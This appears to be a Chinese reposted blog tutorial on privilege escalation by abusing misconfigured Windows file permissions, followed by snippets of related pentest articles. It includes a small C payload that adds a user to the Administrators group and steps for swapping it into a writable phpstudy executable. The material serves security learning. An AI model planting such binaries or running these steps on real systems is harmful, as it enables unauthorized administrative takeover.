利用配置不当提权

最新推荐文章于 2024-02-14 08:00:00 发布
最新推荐文章于 2024-02-14 08:00:00 发布
阅读量179 收藏
点赞数
原文链接:http://www.cnblogs.com/-zhong/p/11054407.html
版权

利用管理员对服务器的权限分配不当完成的权限提升(开发者的意识不够强)

一般情况下面 普通用户对程序是没有控制权的

•    icacls  
•    icacls c:\windows\*.exe /save perm /T 
•    i586-mingw32msvc-gcc -o admin.exe admin.c   (因为exe要给windows用所以这里使用i586-mingw32msvc-gcc这个编译)
•    Find

然后在c盘更目录下面生成了 asd文件  我们用记事本查看 就可以知道每一个exe的权限

但是很遗憾这种情况没有找到

我们看一下我们需要的脚本

#include<stdlib.h>
int main()
{
  int i;
 i=system("net localgroup administrators a /add");
  return 0;
}

这里为了满足实验要求 我们这里加一个普通用户

这里我们以phpstudy为例子 user配置不当 对他的操作是 完全控制

把我们刚才上传的exe改名为这个

然后当管理点击这个的时候 就是默认吧a加入管理员组

那么在liunx如何提权呐???

•    find / -perm 777 -exec ls -l {} \

 

转载于:https://www.cnblogs.com/-zhong/p/11054407.html

weixin_30249203
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux渗透测试之提权(三)——利用配置不当提权
橘子女侠
04-24 988
利用漏洞进行提权 前提:已经成功渗透进目标系统; 目标:利用系统本身的漏洞进行提权利用配置不当提权 前提:已经成功渗透进目标系统; 相比利用漏洞提权,是更常用的方法; 在大部分企业中,会将系统的漏洞即时进行补丁更新,难以通过系统自身我的漏洞进行入侵; 可以查找系统中以system权限启动的服务或应用,可以尝试将其替换或者反弹shell的方式提权; 可以查找NTFS权限允许use...
CVE-2019-14287 sudo 配置不当-权限提升漏洞预警
Vic的博客
10-16 286
报告编号:B6-2019-101501 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-10-15 0x00 漏洞背景 2019年10月14日, sudo 官方在发布了CVE-2019-14287的漏洞预警。 sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户权限控制/切换程序。允许管理员控制服务器下用户...
windows系统配置错误提权
Longwaer
01-05 1341
通过学习掌握windows系统服务权限配置错误,了解提权新技巧。
渗透测试---提权---利用配置不当提权
Z_Grant的博客
08-19 876
文章目录一,Windows中1.lbd 工具 利用配置不当提权 相比利用漏洞提权,是更常用的方法; 在大部分企业中,会将系统的漏洞即时进行补丁更新,难以通过系统自身我的漏洞进行入侵;
kali Linux渗透测试之第三方提权(三)——利用配置文件不当提权
weixin_45116657的博客
08-19 763
利用漏洞提权: 前提:已经成功渗透进入目标系统; 目标:利用系统本身的漏铜进行提权; . 利用配置不当提权: 与漏洞提权相比,利用配置不当提权更为常见。大部分企业环境下,会有相应的补丁跟新策略,因此难以通过相应的漏洞进行入侵。因此,当入侵一台服务器候找不到漏洞,可利用配置不当提权。如: 前提:已经成功渗透进入目标系统; 可以查找系统中以system权限启动的而服务或应用,可以尝试将其替代或...
Windows错误配置提权
谢公子的博客
02-27 2503
目录 Windows错误配置提权 系统服务权限配置错误 PowerUp.ps1实战利用 MSF下实战利用 Windows错误配置提权 当攻击者使用其他提权方法无法提权时,就会利用系统中的配置错误来提权Windows操作系统中的常见配置错误包括管理员凭据配置错误、服务配置错误、故意削弱的安全措施、用户权限过高等。 系统服务权限配置错误 Windows系统服务文件在操作系统启动时加载...
提权
我不是大牛
07-15 1462
当我们拿到WebShell 之后,下一步干什么? 当然是权限提升啊! 简介 通过这些最初的漏洞利用途径,攻击者将获得一定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得比最初更多的权限,以期望从其他账户访问敏感信息,甚至或者获得对整个系统的完全管理控制。当攻击者以这种方式扩大其最初的未经授权访问的权限时,我们将其行为称为权限提升攻击。 水平权限提升(越权) 我们假设攻击者已经获得了在线银...
Linux提权---内核提权、Linux配置错误提权、定时任务提权
qq_40012781的博客
07-03 1746
Linux提权---内核提权、Linux配置错误提权、定时任务提权
Linux提权手法总结以及 Linux提权exp集合
02-22
sudo允许非root用户以其他用户(通常是root)的身份执行命令,如果配置不当,可能导致权限滥用。确保sudo配置严格,仅允许特定的命令和用户使用sudo,并定期审计sudoers文件,可以有效防止此类提权。 压缩包中的...
权限提升-linux提权手法总结
01-14
- **SSH守护进程**:如果SSH守护进程配置不当或存在漏洞,就可能成为提权的目标。 - **cron守护进程**:通过编辑cronjob或利用cron守护进程中的漏洞也可能实现提权。 #### 7. NFS权限弱 网络文件系统(NFS)如果配置...
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2334
提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升
系统配置错误提权2
qq_42307546的博客
04-05 1041
5.2 不带引号的服务路径提权 当系统管理员配置Windows服务时,他们必须指定要执行的命令,或者运行可执行文件的路径。 当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则 系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到 的空格分隔的服务路径的第一个实例。 在c盘新建一个calc files文件夹里面创建一个文件文件叫cmd.bat内容如下 echo 123 并在c 盘目录下放置 calc.exe(计算器),在没有
权限提升:利用Linux错配提权
最新发布
qq_68163788的博客
02-14 1596
在Linux系统中,错误的配置可能导致提权漏洞,使攻击者能够获取比其本来权限更高的权限。这种错误配置可能涉及文件权限、用户组设置、sudo配置等。 一种常见的错误配置提权漏洞是在文件权限设置上。如果系统中的某个文件被设置为具有过高的权限,例如普通用户可以执行的文件被设置为具有root权限,攻击者可以利用这个漏洞来执行恶意代码并获取更高的权限。 另一种错误配置提权漏洞是在用户组设置上。如果某个用户组被错误地配置为具有root权限,攻击者可以将自己添加到这个用户组中,从而获取更高的权限。
linux 安全模式 提权,kali权限提升之配置不当提权与WCE
weixin_32591379的博客
05-15 455
kali权限提升之配置不当提权与WCE1.利用配置不当提权2.WCE3.其他提权一、利用配置不当提权与漏洞提权相比更常用的方法在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵。当入侵一台服务器后,无法照当相应的补丁进行提权,可通过寻找是否存在配置不当进行提权。如:代码中没有进行参数过滤等操作。1.通过查看哪些服务默认以system权限启动,可尝试将其替换或绑定反弹shell...
Kali渗透测试之提权3——利用配置不当提权
浅浅的博客
05-06 564
与漏洞提权相比,利用配置不当提权更为常见。在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵。因此,当入侵一台服务器后找不到漏洞,可利用配置不当进行提权。如: 可以查找系统中以system权限启动的服务或应用,可以尝试将其替换或者反弹shell的方式提权; 可以查找NTFS权限允许users修改删除的应用,利用配置不当进行提权; 代码中是否有过滤参数的...
linux 提权总结
weixin_51681694的博客
06-13 7504
会继续补充.....
Linux权限
niqiu320的博客
05-24 1026
Linux提权大全 日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。 Linux提权信息收集: 什么系统?什么版本? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based 什么内核?是64位吗?
Linux配置不当提权-suid提权
孤的博客
09-14 1664
攻击成功,并得到一个shell,但是这里却只是一个简单的shell,首先需要把它转换为一个交互式的shell 在简单shell中直接按删除键是不行的,要按住ctrl键之后,再按住删除键才可以,其他键的使用也一样 命令 python -c 'import pty;pty.spawn("/bin/bash")' 现在已经进入了一个交互的shell了,但是可以看到这只是一个普通的用户,所以我们要把他提...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值